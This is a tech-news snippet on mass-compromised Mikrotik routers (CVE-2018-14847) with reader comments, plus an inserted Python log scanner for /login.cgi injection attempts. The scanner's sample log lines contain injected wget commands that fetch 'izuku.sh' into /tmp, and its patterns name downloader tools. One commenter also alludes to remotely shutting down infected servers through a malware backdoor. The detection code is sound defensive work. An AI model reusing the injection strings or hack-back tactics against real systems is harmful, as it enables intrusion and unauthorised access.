Mikrotik routers pwned en masse, send network data to mysterious box

More than 7,500 Mikrotik routers have been compromised with malware that logs and transmits network traffic data to an unknown control server. This is according to researchers from 360 Netlab, who found the routers had all been taken over via an exploit for CVE-2018-14847, a vulnerability first disclosed in the Vault7 data …

  1. The Vociferous Time Waster

    SNMP

    Many organisations use the same set of SNMP strings across the business. If you manage to compromise it for one device then you stand to compromise it for everything.

  2. bombastic bob Silver badge

    Is that the one I noticed this morning?

    Since June there have been a number of requests for '/login.cgi' in my web logs (several hundred) with an obvious code injection exploit in the URL, that wget's a file on a server with a specific IP address (several of these observed, looks like they change periodically) which then loads a binary image for MIPS or ARM processors [as appropriate] into /tmp or one of several other directories that it might be able to download something into...

    in any case the script it first downloads is called 'izuku.sh' . I reported my logs and findings to several ISPs who either hosted the machines doing the request, or WERE the host for the downloading.

    Not sure if this is the same one the article talks about, but the one I saw has been around since June (according to my logs) and always tries to download that script file which then attempts to download the binary into one of several directories, then load/run it. And I think if you disable remote management on your router, this (apparent) virus won't infect it. But it could be a different one, not the one the article is about. I don't know. So I mention it anyway, just in case. Details are sometimes useful...

    Anyway, if you have a web server, look for access attempts for /login.cgi and you'll probably see it (the one I'm talking about). Again, dunno if it's the same as the one in the article, but is similar, probably.

    (the first log entry is 15-June at 14:36, in case anybody wonders)
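
One way to run the log check described in the comment above, as an added example that is not part of the original post: it scans Combined Log Format lines for `/login.cgi` requests carrying command-injection markers and pulls out the download host for an abuse report. The log lines, addresses and the `x` parameter name are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - - [timestamp] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Shell metacharacters or downloader names in a decoded URL suggest injection.
INJECTION_RE = re.compile(r'[;|`]|\$\(|\b(?:wget|curl|tftp)\b', re.I)
# Host the injected command would fetch from (what you report to the ISP).
FETCH_HOST_RE = re.compile(r'https?://([^/\s;\'"]+)', re.I)


def scan(lines):
    """Return one dict per /login.cgi request that carries an injection marker."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        src, when, _method, target, status = m.groups()
        path, _, query = target.partition('?')
        if path.lower() != '/login.cgi':
            continue
        decoded = unquote(unquote(query))  # also catches double-encoded input
        if not INJECTION_RE.search(decoded):
            continue  # plain probe for the path, no payload
        hits.append({
            'src': src,
            'time': when,
            'status': int(status),
            'fetch_hosts': sorted(set(FETCH_HOST_RE.findall(decoded))),
            'izuku': 'izuku.sh' in decoded,
        })
    return hits


# Constructed sample lines (documentation address ranges, placeholder parameter).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jul/2018:09:12:44 +0000] "GET /login.cgi?x=1;wget%20http://203.0.113.9/izuku.sh%20-O%20/tmp/i HTTP/1.1" 404 162 "-" "-"',
    '192.0.2.10 - - [01/Jul/2018:09:13:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jul/2018:09:14:20 +0000] "GET /login.cgi HTTP/1.1" 404 162 "-" "-"',
    '198.51.100.23 - - [02/Jul/2018:03:40:11 +0000] "GET /login.cgi?x=1%253Bwget%2520http://203.0.113.77/izuku.sh HTTP/1.1" 404 162 "-" "-"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 404 status on a hit means the server had no such script, so the request was a blind scan rather than a successful injection; the source and fetch-host pairs are still what an abuse report needs.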

    1. defiler

      Re: Is that the one I noticed this morning?

      I'll have to have a look at mine, but the MIPS/ARM binaries will be useless on my CHR.

      Besides, if people are exposing the management interface to the outside world, surely they'd firewall it to trusted addresses only, no?

      1. Pascal Monett Silver badge

        Never underestimate a human's ability to not complete an action properly.

        That is a valid remark in all areas of life, but I think it is especially true in IT. Ironically, IT is the only domain where you generally only need a keyboard to do stuff, and even then, people can be too lazy to finish properly.

        1. defiler

          Sometimes you need a mouse. Especially with Windows... Besides that, couldn't agree more. It's the difference between the sloppy (who are perceived as getting things done) vs the thorough (who are perceived as slow).

          Anyway. The current RouterOS doesn't seem to have a fix for this bug. So, blocking the management interface from the outside world it is then! But what's wonderful is that CHR reboots so fast. I don't even have to disconnect from my Citrix session.

          1. Unoriginal Handle

            Blocking an external management interface from direct access from the internet is an absolute must. If you have to, VPN access to the box and do it that way. If nothing else the logs on the box fill up with denied SSH requests and the filesystem gets to 100% and the box does funny things up to and including becoming unresponsive...

    2. Version 1.0 Silver badge

      Re: Is that the one I noticed this morning?

      And when you reported it to the ISPs, their response was? No need to reply immediately, I'll check this page again in a couple of years to see if you've heard back at all...

      1. bombastic bob Silver badge

        Re: Is that the one I noticed this morning?

        unfortunately it seems nothing's been done about the 'izuku.sh' file, though my logs show different IP addresses hosting it now. Yeah, they ignored me. Well that server _IS_ in Poland... they probably can't read or understand the information properly and/or just ignore it because they regularly host criminal services or similar. [I've had 'confirmed kills' before, with responses, just not that often - usually it is silently fixed or seems so because the activity stops]. Another possibility is that they leave it on the server to see what IP addresses download it to track the thing. Well I won't interfere with law enforcement if that's the case.

        ( I also posted the actual URL on USENET, and described it even better there, so not like it's invisible any more, and anyone can see it in web server logs )

        Back at the turn o' the century, Code Red lingered for several years after the initial infections started. Someone (allegedly me perhaps?) allegedly had an auto-responder that would allegedly shut down the Code Red infected web server remotely (since it was attempting to spread a virus) via the Code Red back door command/control channel and (allegedly) leave a file on the administrator desktop that said something like "you are an idiot" and explained why the web server was shut down remotely. Both of those factoids should frighten any clueless admin into patching the thing (as it was most likely some old unpatched "oh we have a web server running?" Win2k box in a closet that nobody thought about). But I digress...

  3. John Smith 19 Gold badge

    When people release a list of developed exploits....

    perhaps it would be a good idea to start developing upgrades to nullify them first?

  4. JohnG

    SNMP

    "....the controller oddly seems to be interested in collecting traffic from the relatively obscure SNMP ports 161 and 162."

    One possibility is that there is some other exploit in the wild, that transfers information using SNMP, on the basis that SNMP packets to and from almost any device would not be considered out of the ordinary and would be unlikely to trigger an IDS/IPS.

  5. Potemkine! Silver badge

    "from the relatively obscure SNMP ports 161 and 162"

    SNMP, obscure? Muahahahaha

    Is there any network supervision system not using SNMP?

  6. marcusbennett

    Vulnerability is overstated

    FFS. This vulnerability was fixed days after it was discovered. We are now 7 dot releases past this fix at 6.42.7. Any decent Network administrator needs to be monitoring and updating the firmware of your products.

    Secondly the exploit relies on remote access to your router. What complete idiot allows this? Never let external internet access to your router's configuration. Are you completely crazy? I include a URL with the rule to prevent WAN access

    https://0day.city/cve-2018-14847.html

    1. Version 1.0 Silver badge

      Re: Vulnerability is overstated

      I always put a firewall between the outside world and the inside world with a basic "drop all" rule "unless" I specifically permit it.

    2. bombastic bob Silver badge

      Re: Vulnerability is overstated

      yeah that's definitely different from the one I saw [I followed the rabbit trail to a github site with the python code demonstrating the PoC - it's that old yeah]

    3. Anonymous Coward

      @marcus - Re: Vulnerability is overstated

      What complete idiot implements remote access in a consumer firewall ?

      1. djack

        Re: @marcus - Vulnerability is overstated

        "What complete idiot implements remote access in a consumer firewall ?"

        I wouldn't call Mikrotik a consumer firewall. They are squarely aimed at the semi-pro through to carrier market segments.

  7. John Smith 19 Gold badge

    "What complete idiot implements remote access in a consumer firewall ?"

    Simple.

    1) Some code monkey that cut and pasted the code from stack exchange

    2) Some code monkey that cut and pasted the code from a higher end product and didn't consider if these functions were necessary.

    A code monkey is not a code monkey because their coding skills are s**t.

    They're a code monkey because of what they choose to do about it.
